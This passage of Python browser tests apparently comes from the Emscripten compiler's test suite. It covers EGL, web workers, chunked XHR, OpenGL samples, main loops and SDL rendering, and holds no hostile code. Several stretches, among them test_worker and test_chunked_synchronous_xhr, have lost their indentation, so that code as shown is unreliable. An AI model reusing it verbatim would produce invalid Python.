    for extra in ([], ['-s', 'USE_GLFW=2']):
        self.btest('glfw_minimal.c', '1', args=extra + ['-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
  # EGL tests.  _test_egl_base compiles test_egl.c with any extra flags and
  # expects the page to report result 1; variants add pthreads/proxying.
  def _test_egl_base(self, *args):
    self.compile_btest([path_from_root('tests', 'test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
    self.run_browser('page.html', '', '/report_result?1')
  @requires_graphics_hardware
  def test_egl(self):
    self._test_egl_base()
  @requires_threads
  @requires_graphics_hardware
  def test_egl_with_proxy_to_pthread(self):
    self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
  # Same pattern for querying the default canvas size through EGL.
  def _test_egl_width_height_base(self, *args):
    self.compile_btest([path_from_root('tests', 'test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
    self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
  def test_egl_width_height(self):
    self._test_egl_width_height_base()
  @requires_threads
  def test_egl_width_height_with_proxy_to_pthread(self):
    self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
  @requires_graphics_hardware
  def test_egl_createcontext_error(self):
    # Exercises eglCreateContext error paths; the app reports 1 on success.
    self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
  @requires_graphics_hardware
  def test_glgears_long(self):
    # Long-running animated gears: any reported frame count in [15, 500) is
    # accepted, with and without --proxy-to-worker.
    for proxy in [0, 1]:
      print('proxy', proxy)
      self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
  @requires_graphics_hardware
  def test_glgears_animation(self):
    # Three source variants (plain, _full, _full_944); the latter two are also
    # built with FULL_ES2=1.
    es2_suffix = ['', '_full', '_full_944']
    for full_es2 in [0, 1, 2]:
      print(full_es2)
      self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
                          '-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
                          '--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
                         (['-s', 'FULL_ES2=1'] if full_es2 else []))
      self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
  @requires_graphics_hardware
  def test_fulles2_sdlproc(self):
    self.btest_exit('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
  @requires_graphics_hardware
  def test_glgears_deriv(self):
    self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
               args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
               message='You should see animating gears.')
    # Also check the emitted page does not pull in gl-matrix.
    # NOTE(review): assumes btest wrote its output page to 'test.html' — verify.
    with open('test.html') as f:
      assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
  @requires_graphics_hardware
  def test_glbook(self):
    # Build the "OpenGL ES 2.0 Programming Guide" sample programs and compare
    # each against its reference screenshot; chapters 10 and 13 need texture
    # assets copied in and preloaded.
    self.emcc_args.remove('-Werror')
    programs = self.get_library('glbook', [
      os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
      os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
      os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
      os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
      os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
      os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
      os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
    ], configure=None)
    def book_path(*pathelems):
      # Resolve a path under tests/glbook.
      return path_from_root('tests', 'glbook', *pathelems)
    for program in programs:
      print(program)
      basename = os.path.basename(program)
      args = ['-lGL', '-lEGL', '-lX11']
      if basename == 'CH10_MultiTexture.o':
        shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
        shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
        args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
      elif basename == 'CH13_ParticleSystem.o':
        shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
        args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
      self.btest(program,
                 reference=book_path(basename.replace('.o', '.png')),
                 args=args)
  @requires_graphics_hardware
  @parameterized({
    'normal': (['-s', 'FULL_ES2=1'],),
    # Enabling FULL_ES3 also enables ES2 automatically
    'full_es3': (['-s', 'FULL_ES3=1'],)
  })
  def test_gles2_emulation(self, args):
    # Build several GLES2 book samples against the ES2/ES3 emulation layer and
    # compare each against its reference image; texture assets are copied in
    # and preloaded for all runs.
    print(args)
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
    shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
    for source, reference in [
      (os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
      # (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
      (os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
      # (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
      (os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
      (os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
      (os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
    ]:
      print(source)
      self.btest(source,
                 reference=reference,
                 args=['-I' + path_from_root('tests', 'glbook', 'Common'),
                       path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
                       path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
                       path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
                       path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
                       '-lGL', '-lEGL', '-lX11',
                       '--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
  @requires_graphics_hardware
  def test_clientside_vertex_arrays_es3(self):
    self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
  def test_emscripten_api(self):
    self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
  def test_emscripten_api2(self):
    # Package two data files with the file packager, first into the current
    # directory and then into a subdirectory, checking both can be consumed.
    def setup():
      create_test_file('script1.js', '''
        Module._set(456);
      ''')
      create_test_file('file1.txt', 'first')
      create_test_file('file2.txt', 'second')
    setup()
    self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
    self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
    # check using file packager to another dir
    self.clear()
    setup()
    ensure_dir('sub')
    self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
    shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
    self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
  def test_emscripten_api_infloop(self):
    self.btest('emscripten_api_browser_infloop.cpp', '7')
  def test_emscripten_fs_api(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
    self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
  def test_emscripten_fs_api2(self):
    # Run both with and without runtime assertions.
    self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
    self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
  # The main-loop tests below run the same scenario under several build
  # configurations (plain, proxied-to-worker, pthreads) and expect a fixed
  # result code.
  @requires_threads
  def test_emscripten_main_loop(self):
    for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
      self.btest('emscripten_main_loop.cpp', '0', args=args)
  @requires_threads
  def test_emscripten_main_loop_settimeout(self):
    for args in [
      [],
      # test pthreads + AUTO_JS_LIBRARIES mode as well
      ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
    ]:
      self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
  @requires_threads
  def test_emscripten_main_loop_and_blocker(self):
    for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
      self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
  @requires_threads
  def test_emscripten_main_loop_setimmediate(self):
    for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
      self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
  def test_fs_after_main(self):
    # Filesystem access after main() returns, with and without -O1.
    for args in [[], ['-O1']]:
      self.btest('fs_after_main.cpp', '0', args=args)
  def test_sdl_quit(self):
    self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
  def test_sdl_resize(self):
    # FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
    self.emcc_args.append('-Wno-deprecated-declarations')
    self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
  def test_glshaderinfo(self):
    self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
  @requires_graphics_hardware
  def test_glgetattachedshaders(self):
    self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
  # Covered by dEQP text suite (we can remove it later if we add coverage for that).
  @requires_graphics_hardware
  def test_glframebufferattachmentinfo(self):
    self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
  @requires_graphics_hardware
  def test_sdlglshader(self):
    # Also exercises closure + -O2 on the shader test.
    self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_sdlglshader2(self):
    self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
  @requires_graphics_hardware
  def test_gl_glteximage(self):
    self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
  @requires_graphics_hardware
  @requires_threads
  def test_gl_textures(self):
    # Texture upload, plain and with a proxying pthread + offscreen framebuffer.
    for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
      self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
  # gl_ps* tests: rendering from client-side pointers plus a shader, under the
  # legacy GL emulation, against per-test reference images.
  @requires_graphics_hardware
  def test_gl_ps(self):
    # pointers and a shader
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
  @requires_graphics_hardware
  def test_gl_ps_packed(self):
    # packed data that needs to be strided
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
  @requires_graphics_hardware
  def test_gl_ps_strides(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
  @requires_graphics_hardware
  def test_gl_ps_worker(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
  # The next few tests run with GL_UNSAFE_OPTS=0 to cover the safe code paths.
  @requires_graphics_hardware
  def test_gl_renderers(self):
    self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_gl_stride(self):
    self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_gl_vertex_buffer_pre(self):
    self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_gl_vertex_buffer(self):
    self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
  @requires_graphics_hardware
  def test_gles2_uniform_arrays(self):
    self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
  @requires_graphics_hardware
  def test_gles2_conformance(self):
    self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
  @requires_graphics_hardware
  def test_matrix_identity(self):
    self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  # cubegeom_pre* tests: third-party cube-geometry renderers built against the
  # legacy GL emulation (or Regal), compared to reference screenshots.
  @requires_graphics_hardware
  @no_swiftshader
  def test_cubegeom_pre(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  @no_swiftshader
  def test_cubegeom_pre_regal(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  @requires_sync_compilation
  def test_cubegeom_pre_relocatable(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
  @requires_graphics_hardware
  @no_swiftshader
  def test_cubegeom_pre2(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
  @requires_graphics_hardware
  @no_swiftshader
  def test_cubegeom_pre3(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @parameterized({
    '': ([],),
    'tracing': (['-sTRACE_WEBGL_CALLS'],),
  })
  @requires_graphics_hardware
  def test_cubegeom(self, args):
    # proxy only in the simple, normal case (we can't trace GL calls when
    # proxied)
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
  @requires_graphics_hardware
  def test_cubegeom_regal(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
  @requires_threads
  @requires_graphics_hardware
  def test_cubegeom_regal_mt(self):
    # Regal + pthreads; not proxied since the build is already multithreaded.
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
  @requires_graphics_hardware
  def test_cubegeom_proc(self):
    # A side file declares a global named like a GL function to check that the
    # name collision does not break SDL_GL_GetProcAddress lookup.
    create_test_file('side.c', r'''
      extern void* SDL_GL_GetProcAddress(const char *);
      void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
      void *getBindBuffer() {
        if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
        return glBindBuffer;
      }
    ''')
    # also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
    for opts in [[], ['-O1'], ['-Os']]:
      self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  # The remaining cubegeom variants below each exercise one feature (GLEW,
  # color arrays, normals, direct client-side pointers, multitexture, texture
  # matrices, fog, VAOs, uniform arrays) against its reference image.
  @requires_graphics_hardware
  def test_cubegeom_glew(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
  @requires_graphics_hardware
  def test_cubegeom_color(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_cubegeom_normal(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
  @requires_graphics_hardware
  def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
  @requires_graphics_hardware
  def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  @no_firefox('fails on CI but works locally')
  def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_cubegeom_mt(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
  @requires_graphics_hardware
  def test_cubegeom_color2(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
  @requires_graphics_hardware
  def test_cubegeom_texturematrix(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_cubegeom_fog(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  @no_swiftshader
  def test_cubegeom_pre_vao(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  @no_swiftshader
  def test_cubegeom_pre_vao_regal(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  @no_swiftshader
  def test_cubegeom_pre2_vao(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_cubegeom_pre2_vao2(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  @no_swiftshader
  def test_cubegeom_pre_vao_es(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_cubegeom_u4fv_2(self):
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_cube_explosion(self):
    self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
  @requires_graphics_hardware
  def test_glgettexenv(self):
    self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
  # SDL canvas/surface tests: each compares the rendered canvas to a
  # reference image.
  def test_sdl_canvas_blank(self):
    self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
  def test_sdl_canvas_palette(self):
    self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
